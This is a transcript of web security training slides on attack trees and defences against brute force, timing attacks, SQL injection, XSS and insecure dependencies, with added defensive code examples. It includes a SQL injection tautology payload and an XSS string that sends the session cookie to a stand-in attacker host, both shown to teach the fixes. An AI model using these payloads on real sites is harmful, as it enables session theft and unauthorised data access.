Surviving Web Security
gergely-nemeth
Transcript of Surviving Web Security
WHAT DO THEY HAVE IN COMMON?
TOGETHER, ALMOST 1 BILLION USER ACCOUNTS COMPROMISED
https://haveibeenpwned.com
ATTACK TREES
“formal, methodical way of describing the security of systems, based on varying attacks”
Bruce Schneier, "Attack Trees", Dr. Dobb's Journal (1999)
ATTACK TREES
Open safe
  Pick lock
  Learn combo
    Find it written
    Learn from target
      Blackmail
      Eavesdrop (both steps required)
        Listen to convo
        Get target to say
      Bribe
  Cut open
  Bad setup
ATTACK TREES
To get the most out of attack trees you have to combine them with knowledge of the attackers: which leaves are within reach of the attacker you are defending against, and at what cost.
ATTACK TREES
The same tree annotated for one attacker profile: (P) possible, (I) impossible. An OR node is possible if any alternative is possible; an AND node only if every required step is.
Open safe (P)
  Pick lock (I)
  Learn combo (P)
    Find it written (I)
    Learn from target (P)
      Blackmail (I)
      Eavesdrop (I) (both steps required)
        Listen to convo (P)
        Get target to say (I)
      Bribe (P)
  Cut open (P)
  Bad setup (I)
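The propagation described above, carried through in code as an added example (this is not code from the slides or from RisingStack). The tree and the (P)/(I) marks are the safe example from the slide; the cost figures are assumed for illustration and are not on the slide. `evaluate` returns whether a node is reachable, the cheapest cost of reaching it and the path that achieves it.

```javascript
// Added example: evaluating an attack tree by propagating per-leaf
// feasibility and cost up OR/AND nodes (Schneier's method).
// (P)/(I) marks come from the slide; the costs are ASSUMED values.

const safeTree = {
  name: 'Open safe', type: 'OR', children: [
    { name: 'Pick lock', possible: false, cost: 30000 },
    { name: 'Learn combo', type: 'OR', children: [
      { name: 'Find it written', possible: false, cost: 75000 },
      { name: 'Learn from target', type: 'OR', children: [
        { name: 'Blackmail', possible: false, cost: 100000 },
        // Eavesdropping only works if the attacker can listen AND make the
        // target say the combination, so this is an AND node.
        { name: 'Eavesdrop', type: 'AND', children: [
          { name: 'Listen to convo', possible: true, cost: 20000 },
          { name: 'Get target to say', possible: false, cost: 40000 },
        ] },
        { name: 'Bribe', possible: true, cost: 20000 },
      ] },
    ] },
    { name: 'Cut open', possible: true, cost: 10000 },
    { name: 'Bad setup', possible: false, cost: 100000 },
  ],
};

// Returns { possible, cost, path } for a node.
// OR: the cheapest possible child wins.
// AND: every child must be possible and the costs add up.
function evaluate(node) {
  if (!node.children) {
    return { possible: node.possible, cost: node.cost, path: [node.name] };
  }
  const results = node.children.map(evaluate);
  if (node.type === 'AND') {
    const possible = results.every(r => r.possible);
    return {
      possible,
      cost: possible ? results.reduce((sum, r) => sum + r.cost, 0) : Infinity,
      path: possible ? [node.name, ...results.flatMap(r => r.path)] : [node.name],
    };
  }
  const feasible = results.filter(r => r.possible);
  if (feasible.length === 0) {
    return { possible: false, cost: Infinity, path: [node.name] };
  }
  const best = feasible.reduce((a, b) => (b.cost < a.cost ? b : a));
  return { possible: true, cost: best.cost, path: [node.name, ...best.path] };
}

const result = evaluate(safeTree);
console.log(result.possible, result.cost, result.path.join(' -> '));
```

With these assumed costs the cheapest feasible attack is cutting the safe open; the eavesdropping branch stays impossible even though listening is possible, because the AND node needs both steps. That is the kind of conclusion the attacker-knowledge annotation is for: spend on the leaves that are both possible and cheap.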
EXAMPLE ATTACK TREE OF A TRACE ACCOUNT
Goal: Get access to account
Nodes of the tree:
- Modify credentials in the database
- Learn password
- Get access to database
- Social engineering
- Get access to DMZ
- Listen on the transport layer
- Brute force
- Bypass access control
- SQL Injection
- Session hijack
- Insecure dependency
SECURE TRANSPORT LAYER
(attack-tree node: Listen on the transport layer)
BRUTE-FORCE ATTACKS
(attack-tree node: Brute force)
BRUTE-FORCE PROTECTION
// rate-limit login attempts per account with the ratelimiter module (backed by Redis)
var Limiter = require('ratelimiter')
var email = req.body.email
var limit = new Limiter({ id: email, db: db })
limit.get(function (err, limit) {
  if (err) return next(err)
  if (!limit.remaining) return res.status(429).send('Too many login attempts')
  next()
})
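The same protection as a stand-alone piece, added here as an example (not code from the slides or from the ratelimiter module): a fixed-window limiter keyed by the account under attack rather than by client IP, so an attacker rotating source addresses does not reset the counter. The in-memory Map stands in for the Redis store the slide's Limiter uses; the window length, attempt count, the Express-style req/res/next shape and the attack sequence are all assumed for the example.

```javascript
// Added example: fixed-window login limiter keyed by account (e-mail).
// Map replaces Redis; max/windowMs are assumed policy values.
class LoginLimiter {
  constructor({ max = 5, windowMs = 15 * 60 * 1000 } = {}) {
    this.max = max;
    this.windowMs = windowMs;
    this.buckets = new Map(); // key -> { count, resetAt }
  }

  // Records one attempt for `key` at time `now` and says whether it may proceed.
  attempt(key, now = Date.now()) {
    let b = this.buckets.get(key);
    if (!b || now >= b.resetAt) {
      b = { count: 0, resetAt: now + this.windowMs };
      this.buckets.set(key, b);
    }
    if (b.count >= this.max) {
      return { allowed: false, remaining: 0, retryAfterMs: b.resetAt - now };
    }
    b.count += 1;
    return { allowed: true, remaining: this.max - b.count, retryAfterMs: 0 };
  }

  // Clear the counter after a successful login so legitimate users are not
  // stuck behind their own typos.
  reset(key) {
    this.buckets.delete(key);
  }
}

// Express-style middleware factory (req/res/next shape assumed; no Express needed).
// The key is normalised so "A@Example.com " and "a@example.com" share a bucket.
function bruteForceGuard(limiter) {
  return function (req, res, next) {
    const key = String((req.body && req.body.email) || '').trim().toLowerCase();
    const verdict = limiter.attempt(key);
    if (!verdict.allowed) {
      res.setHeader('Retry-After', Math.ceil(verdict.retryAfterMs / 1000));
      return res.status(429).send('Too many login attempts, try again later');
    }
    next();
  };
}

// Constructed attack: seven guesses against one account, one second apart.
function simulate(guesses, limiter = new LoginLimiter({ max: 5, windowMs: 60000 })) {
  const t0 = 1000000;
  return guesses.map((g, i) => limiter.attempt(g.email, t0 + i * 1000).allowed);
}

const outcome = simulate(Array.from({ length: 7 }, () => ({ email: 'victim@example.com' })));
console.log(outcome); // five attempts allowed, then denied
```

Keying on the account means an attacker can lock a victim out by spamming bad guesses; in production pair this with a per-IP limit and progressive delays rather than a hard lock, and always clear the counter on a successful login.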
BRUTE-FORCE PROTECTION - TIMING ATTACKS
// the bad solution: === can return at the first differing character,
// so the response time leaks how much of the guess was right
if (userEnteredPassword === passwordFromDb) { return true }
return false
BRUTE-FORCE PROTECTION - TIMING ATTACKS
// the good solution: compare in constant time
var cryptiles = require('cryptiles')
if (cryptiles.fixedTimeComparison(userEnteredPassword, passwordFromDb)) { return true }
return false
Note: passwordFromDb should be a salted hash (bcrypt, scrypt), never the plaintext password; hash the user's input with the stored salt and compare the two hashes in constant time.
SQL INJECTION
(attack-tree node: SQL Injection)
DATA VALIDATION - SQL INJECTION
This attack vector consists of injecting a partial or complete SQL query through user input.
DATA VALIDATION - SQL INJECTION
select username, password from users where username='$username'
with the input john' or '1'='1 can become:
select username, password from users where username='john' or '1'='1'
DATA VALIDATION - SQL INJECTION
// parameterized query (node-postgres): values are sent separately from the SQL text
client.query("select name from emp where emp_id=$1", [123])
// prepared (named) query
client.query({ name: "emp_name", text: "select name from emp where emp_id=$1", values: [123] })
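An added example (not code from the slides or from node-postgres) making the difference visible: the concatenated query with the injected tautology, next to a placeholder substitution that keeps each value inside its own literal. `bindParams` mimics client-side literal quoting only so the effect can be seen without a database; in real code pass the placeholders and values to the driver, as the `client.query` call above does, and let the server bind them.

```javascript
// Added example: string concatenation versus a parameter boundary.

// Vulnerable: user input spliced into the SQL text.
function buildLoginQueryUnsafe(username) {
  return "select username, password from users where username='" + username + "'";
}

// Quote a JavaScript value as a SQL literal (single quotes doubled, NUL rejected).
function toSqlLiteral(value) {
  if (value === null || value === undefined) return 'NULL';
  if (typeof value === 'number' && Number.isFinite(value)) return String(value);
  if (typeof value === 'boolean') return value ? 'TRUE' : 'FALSE';
  const s = String(value);
  if (s.includes('\0')) throw new Error('NUL byte in SQL literal');
  return "'" + s.replace(/'/g, "''") + "'";
}

// Substitute $1..$n placeholders with quoted literals. Every value stays inside
// its own literal, so attacker-supplied quotes cannot close the string.
function bindParams(text, values) {
  return text.replace(/\$(\d+)/g, (_, n) => {
    const i = Number(n) - 1;
    if (i < 0 || i >= values.length) throw new Error('missing value for $' + n);
    return toSqlLiteral(values[i]);
  });
}

const payload = "john' or '1'='1";  // constructed attacker input
console.log(buildLoginQueryUnsafe(payload));
// select username, password from users where username='john' or '1'='1'
console.log(bindParams('select username, password from users where username=$1', [payload]));
// select username, password from users where username='john'' or ''1''=''1'
```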
SESSION HIJACK
(attack-tree node: Session hijack)
COOKIES - COOKIE FLAGS
- secure - this attribute tells the browser to only send the cookie if the request is being sent over HTTPS.
- HttpOnly - this attribute helps limit the damage of attacks such as cross-site scripting, since it does not allow the cookie to be read via JavaScript.
DATA VALIDATION - XSS
- Reflected Cross Site Scripting occurs when attacker-controlled input from the request (for example a parameter in a specially crafted link) is echoed into the HTML response without encoding, so the injected JavaScript runs when the victim opens the link.
- Stored Cross Site Scripting occurs when the application stores user input that is not correctly filtered and later serves it to other users. In both cases the script runs in the victim's browser under the origin of the web application, with access to its session.
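The reflected case from the bullets above and the output encoding that neutralises it, as an added example (not code from the slides): `renderSearch` is a hypothetical page template and the attack string is constructed for the example.

```javascript
// Added example: reflected XSS via an unencoded query parameter, and the fix.

// Encode the characters that have meaning in HTML text and attribute values.
function escapeHtml(s) {
  return String(s).replace(/[&<>"'\/]/g, ch => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;', '/': '&#x2F;',
  }[ch]));
}

// Vulnerable: the q parameter is echoed into the HTML body unencoded, so a
// crafted link such as /search?q=<script>...</script> runs in the victim's browser.
function renderSearchUnsafe(q) {
  return `<h1>Results for ${q}</h1>`;
}

// Fixed: encode for the HTML body context before interpolating.
function renderSearch(q) {
  return `<h1>Results for ${escapeHtml(q)}</h1>`;
}

// Attribute values need the same encoding AND quoting; an unquoted attribute
// can be broken out of with a single space.
function renderInput(value) {
  return `<input name="q" value="${escapeHtml(value)}">`;
}

// Constructed attack string: exfiltrates the session cookie to an attacker host.
const attack = '<script>document.location="https://evil.example/?c="+document.cookie</script>';
console.log(renderSearchUnsafe(attack)); // script tag intact: executes
console.log(renderSearch(attack));       // &lt;script&gt;...: rendered as text
```

Encoding is context-specific: the same value placed inside a `<script>` block, a URL or a CSS property needs a different encoder, which is why templating engines that auto-escape per context are preferable to hand-rolled helpers like this one.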
SECURITY HEADERS
- Strict-Transport-Security tells the browser to use only HTTPS for this host for the given max-age (and, with includeSubDomains, for its subdomains).
- X-Frame-Options provides clickjacking protection by refusing to be framed (DENY) or allowing only same-origin frames (SAMEORIGIN).
- X-XSS-Protection enables the cross-site scripting (XSS) filter built into browsers of the time; the filter has since been removed from major browsers, so do not rely on it and prefer Content-Security-Policy.
- Content-Security-Policy prevents a wide range of attacks, including cross-site scripting and other cross-site injections, by restricting where scripts, styles and other resources may load from.
HANDLING DEPENDENCIES
(attack-tree node: Insecure dependency)
HANDLING DEPENDENCIES
Update your dependencies frequently, and check the installed versions against known vulnerabilities (npm audit does this from the lockfile).
https://greenkeeper.io (Greenkeeper, the update bot shown here, was shut down in 2020 and pointed its users to Snyk)
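The check behind that advice, as an added example (not code from the slides, npm or Greenkeeper): walk a lockfile's dependency tree, including transitive packages, and flag every version that falls inside an advisory's vulnerable range. The lockfile excerpt, the package names and the advisories are constructed for this example and are not real advisories.

```javascript
// Added example: matching installed dependency versions against advisories.

// Compare two "major.minor.patch" strings: negative, zero or positive.
function compareSemver(a, b) {
  const pa = a.split('.').map(Number);
  const pb = b.split('.').map(Number);
  for (let i = 0; i < 3; i++) {
    const da = pa[i] || 0, db = pb[i] || 0;
    if (da !== db) return da - db;
  }
  return 0;
}

// An advisory says: versions >= introduced and < fixed are vulnerable.
function isVulnerable(version, advisory) {
  return compareSemver(version, advisory.introduced) >= 0 &&
         compareSemver(version, advisory.fixed) < 0;
}

// Walk a lockfile-style "dependencies" object, recursing into nested
// (transitive) dependencies, and report each vulnerable package with the
// path that pulls it in.
function audit(lock, advisories) {
  const findings = [];
  const walk = (deps, path) => {
    for (const [name, meta] of Object.entries(deps || {})) {
      for (const adv of advisories.filter(a => a.name === name)) {
        if (isVulnerable(meta.version, adv)) {
          findings.push({
            name,
            version: meta.version,
            fixed: adv.fixed,
            path: [...path, name].join(' > '),
          });
        }
      }
      walk(meta.dependencies, [...path, name]);
    }
  };
  walk(lock.dependencies, []);
  return findings;
}

// Constructed lockfile excerpt and advisories (not real packages or CVEs).
const sampleLock = { dependencies: {
  'example-web': { version: '4.13.1', dependencies: {
    'example-parser': { version: '1.2.0' },
  } },
  'example-templates': { version: '0.9.5' },
} };
const sampleAdvisories = [
  { name: 'example-parser', introduced: '1.0.0', fixed: '1.3.0' },
  { name: 'example-templates', introduced: '0.0.0', fixed: '0.9.5' },
];

console.log(audit(sampleLock, sampleAdvisories));
// [{ name: 'example-parser', version: '1.2.0', fixed: '1.3.0', path: 'example-web > example-parser' }]
```

The transitive finding is the point: the application never asked for `example-parser`, so only a tool that reads the lockfile rather than package.json will see it, and the fix is to bump `example-web` (or override the nested version) rather than to add a direct dependency.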
RESTRICT DATABASE ACCESS
(attack-tree node: Get access to database)
EXAMPLE STORY
Given an unauthenticated user
When she tries to view her profile
Then she is redirected to the login page
OWASP Top Ten (2013)
https://www.owasp.org/index.php/OWASP_Top_Ten_Cheat_Sheet
Injection
Broken Authentication and Session Management
Cross-Site Scripting (XSS)
Insecure Direct Object References
Security Misconfiguration
Sensitive Data Exposure
Missing Function Level Access Control
Cross-Site Request Forgery
Using Components with Known Vulnerabilities
Unvalidated Redirects and Forwards